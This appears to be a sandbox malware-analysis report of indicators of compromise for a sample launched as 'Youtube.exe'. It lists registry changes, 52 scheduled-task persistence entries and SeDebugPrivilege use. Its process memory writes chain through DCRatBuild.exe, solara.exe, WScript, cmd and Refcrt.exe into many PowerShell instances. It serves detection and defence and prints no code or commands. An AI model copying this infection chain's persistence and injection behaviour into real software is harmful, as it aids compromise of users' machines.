Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "224"	LogonUI.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox-player\DefaultIcon	Bloxstrap-v2.5.4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "2"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e00310000000000f158d76c100054656d7000003a0009000400efbee958d388f158dd6c2e0000005957020000000100000000000000000000000000000040061001540065006d007000000014000000	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings	DCRatBuild.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox-player\shell	Bloxstrap-v2.5.4.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Bloxstrap\\Bloxstrap.exe\" %1"	Bloxstrap-v2.5.4.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox-player\shell\open	Bloxstrap-v2.5.4.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings	solara.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings	Roblox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox\URL Protocol	Bloxstrap-v2.5.4.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox-player	Bloxstrap-v2.5.4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Bloxstrap\\Bloxstrap.exe"	Bloxstrap-v2.5.4.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox-player\shell\open\command	Bloxstrap-v2.5.4.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\NodeSlot = "1"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox-player\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Bloxstrap\\Bloxstrap.exe"	Bloxstrap-v2.5.4.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\roblox\shell\open	Bloxstrap-v2.5.4.exe
Key created	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000f158156c100041646d696e003c0009000400efbee958d388f158156c2e00000039570200000001000000000000000000000000000000ae558a00410064006d0069006e00000014000000	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 346531.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe\:SmartScreen:$DATA	Bloxstrap-v2.5.4.exe
File created	C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe\:Zone.Identifier:$DATA	Bloxstrap-v2.5.4.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4424	PING.EXE
5780	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 52 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3152	schtasks.exe
3060	schtasks.exe
4068	schtasks.exe
2108	schtasks.exe
1472	schtasks.exe
5824	schtasks.exe
3160	schtasks.exe
3056	schtasks.exe
2832	schtasks.exe
2440	schtasks.exe
756	schtasks.exe
1204	schtasks.exe
1624	schtasks.exe
4612	schtasks.exe
2072	schtasks.exe
2184	schtasks.exe
5368	schtasks.exe
1344	schtasks.exe
3420	schtasks.exe
2128	schtasks.exe
2448	schtasks.exe
1988	schtasks.exe
3500	schtasks.exe
3164	schtasks.exe
1300	schtasks.exe
4924	schtasks.exe
5072	schtasks.exe
3160	schtasks.exe
912	schtasks.exe
2040	schtasks.exe
4572	schtasks.exe
4664	schtasks.exe
4792	schtasks.exe
4980	schtasks.exe
4692	schtasks.exe
1020	schtasks.exe
3736	schtasks.exe
3368	schtasks.exe
3172	schtasks.exe
4332	schtasks.exe
3544	schtasks.exe
1036	schtasks.exe
1716	schtasks.exe
4100	schtasks.exe
2372	schtasks.exe
4748	schtasks.exe
1436	schtasks.exe
4704	schtasks.exe
2076	schtasks.exe
5048	schtasks.exe
400	schtasks.exe
3516	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1540	SolaraBootstrapper.exe
1540	SolaraBootstrapper.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
3876	Refcrt.exe
4752	powershell.exe
4752	powershell.exe
1480	powershell.exe
1480	powershell.exe
1084	powershell.exe
1084	powershell.exe
4008	powershell.exe
4008	powershell.exe
3872	powershell.exe
3872	powershell.exe
5008	powershell.exe
5008	powershell.exe
952	powershell.exe
952	powershell.exe
2332	powershell.exe
2332	powershell.exe
1204	powershell.exe
1204	powershell.exe
4912	powershell.exe
4912	powershell.exe
784	powershell.exe
784	powershell.exe
2904	powershell.exe
2904	powershell.exe
4536	powershell.exe
4536	powershell.exe
4952	powershell.exe
4952	powershell.exe
1548	powershell.exe
1548	powershell.exe
1204	powershell.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe
1772	SolaraBootstrapper.exe
1772	SolaraBootstrapper.exe
4752	powershell.exe
4008	powershell.exe
4536	powershell.exe
4912	powershell.exe
2332	powershell.exe
1480	powershell.exe
784	powershell.exe
1084	powershell.exe
5008	powershell.exe
3872	powershell.exe
2904	powershell.exe
1548	powershell.exe
4952	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
5296	fontdrvhost.exe
1772	SolaraBootstrapper.exe
3408	Roblox.exe
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

pid	Process
4568	msedge.exe
4568	msedge.exe
676	msedgewebview2.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1540	SolaraBootstrapper.exe
Token: SeDebugPrivilege	3876	Refcrt.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	4536	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	4912	powershell.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	784	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	1772	SolaraBootstrapper.exe
Token: SeShutdownPrivilege	6052	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6052	msiexec.exe
Token: SeSecurityPrivilege	6096	msiexec.exe
Token: SeCreateTokenPrivilege	6052	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	6052	msiexec.exe
Token: SeLockMemoryPrivilege	6052	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6052	msiexec.exe
Token: SeMachineAccountPrivilege	6052	msiexec.exe
Token: SeTcbPrivilege	6052	msiexec.exe
Token: SeSecurityPrivilege	6052	msiexec.exe
Token: SeTakeOwnershipPrivilege	6052	msiexec.exe
Token: SeLoadDriverPrivilege	6052	msiexec.exe
Token: SeSystemProfilePrivilege	6052	msiexec.exe
Token: SeSystemtimePrivilege	6052	msiexec.exe
Token: SeProfSingleProcessPrivilege	6052	msiexec.exe
Token: SeIncBasePriorityPrivilege	6052	msiexec.exe
Token: SeCreatePagefilePrivilege	6052	msiexec.exe
Token: SeCreatePermanentPrivilege	6052	msiexec.exe
Token: SeBackupPrivilege	6052	msiexec.exe
Token: SeRestorePrivilege	6052	msiexec.exe
Token: SeShutdownPrivilege	6052	msiexec.exe
Token: SeDebugPrivilege	6052	msiexec.exe
Token: SeAuditPrivilege	6052	msiexec.exe
Token: SeSystemEnvironmentPrivilege	6052	msiexec.exe
Token: SeChangeNotifyPrivilege	6052	msiexec.exe
Token: SeRemoteShutdownPrivilege	6052	msiexec.exe
Token: SeUndockPrivilege	6052	msiexec.exe
Token: SeSyncAgentPrivilege	6052	msiexec.exe
Token: SeEnableDelegationPrivilege	6052	msiexec.exe
Token: SeManageVolumePrivilege	6052	msiexec.exe
Token: SeImpersonatePrivilege	6052	msiexec.exe
Token: SeCreateGlobalPrivilege	6052	msiexec.exe
Token: SeRestorePrivilege	6096	msiexec.exe
Token: SeTakeOwnershipPrivilege	6096	msiexec.exe
Token: SeRestorePrivilege	6096	msiexec.exe
Token: SeTakeOwnershipPrivilege	6096	msiexec.exe
Token: SeRestorePrivilege	6096	msiexec.exe
Token: SeTakeOwnershipPrivilege	6096	msiexec.exe
Token: SeRestorePrivilege	6096	msiexec.exe
Token: SeTakeOwnershipPrivilege	6096	msiexec.exe
Token: SeDebugPrivilege	5476	conhost.exe
Token: SeRestorePrivilege	6096	msiexec.exe
Token: SeTakeOwnershipPrivilege	6096	msiexec.exe
Token: SeDebugPrivilege	5560	powershell.exe
Token: SeDebugPrivilege	3540	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
676	msedgewebview2.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
3356	Bloxstrap-v2.5.4.exe
12520	Bloxstrap.exe
12520	Bloxstrap.exe
8100	Bloxstrap-v2.7.0.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
6304	Bloxstrap.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
3356	Bloxstrap-v2.5.4.exe
12520	Bloxstrap.exe
12520	Bloxstrap.exe
8100	Bloxstrap-v2.7.0.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
6304	Bloxstrap.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe
4568	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
10464	LogonUI.exe

Suspicious use of UnmapMainImage 3 IoCs

pid	Process
9952	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 4604	2556	Youtube.exe	82
PID 2556 wrote to memory of 4604	2556	Youtube.exe	82
PID 2556 wrote to memory of 4604	2556	Youtube.exe	82
PID 2556 wrote to memory of 1852	2556	Youtube.exe	83
PID 2556 wrote to memory of 1852	2556	Youtube.exe	83
PID 2556 wrote to memory of 1852	2556	Youtube.exe	83
PID 2556 wrote to memory of 3560	2556	Youtube.exe	84
PID 2556 wrote to memory of 3560	2556	Youtube.exe	84
PID 2556 wrote to memory of 3500	2556	Youtube.exe	85
PID 2556 wrote to memory of 3500	2556	Youtube.exe	85
PID 2556 wrote to memory of 3500	2556	Youtube.exe	85
PID 4604 wrote to memory of 1540	4604	Result.exe	86
PID 4604 wrote to memory of 1540	4604	Result.exe	86
PID 4604 wrote to memory of 1540	4604	Result.exe	86
PID 3500 wrote to memory of 1972	3500	Frage build.exe	88
PID 3500 wrote to memory of 1972	3500	Frage build.exe	88
PID 3500 wrote to memory of 1972	3500	Frage build.exe	88
PID 1852 wrote to memory of 1096	1852	DCRatBuild.exe	89
PID 1852 wrote to memory of 1096	1852	DCRatBuild.exe	89
PID 1852 wrote to memory of 1096	1852	DCRatBuild.exe	89
PID 4604 wrote to memory of 1592	4604	Result.exe	90
PID 4604 wrote to memory of 1592	4604	Result.exe	90
PID 4604 wrote to memory of 1592	4604	Result.exe	90
PID 1592 wrote to memory of 3488	1592	solara.exe	169
PID 1592 wrote to memory of 3488	1592	solara.exe	169
PID 1592 wrote to memory of 3488	1592	solara.exe	169
PID 3488 wrote to memory of 704	3488	WScript.exe	92
PID 3488 wrote to memory of 704	3488	WScript.exe	92
PID 3488 wrote to memory of 704	3488	WScript.exe	92
PID 704 wrote to memory of 3876	704	cmd.exe	94
PID 704 wrote to memory of 3876	704	cmd.exe	94
PID 3876 wrote to memory of 4536	3876	Refcrt.exe	141
PID 3876 wrote to memory of 4536	3876	Refcrt.exe	141
PID 3876 wrote to memory of 1480	3876	Refcrt.exe	142
PID 3876 wrote to memory of 1480	3876	Refcrt.exe	142
PID 3876 wrote to memory of 2332	3876	Refcrt.exe	143
PID 3876 wrote to memory of 2332	3876	Refcrt.exe	143
PID 3876 wrote to memory of 1084	3876	Refcrt.exe	144
PID 3876 wrote to memory of 1084	3876	Refcrt.exe	144
PID 3876 wrote to memory of 3872	3876	Refcrt.exe	145
PID 3876 wrote to memory of 3872	3876	Refcrt.exe	145
PID 3876 wrote to memory of 952	3876	Refcrt.exe	146
PID 3876 wrote to memory of 952	3876	Refcrt.exe	146
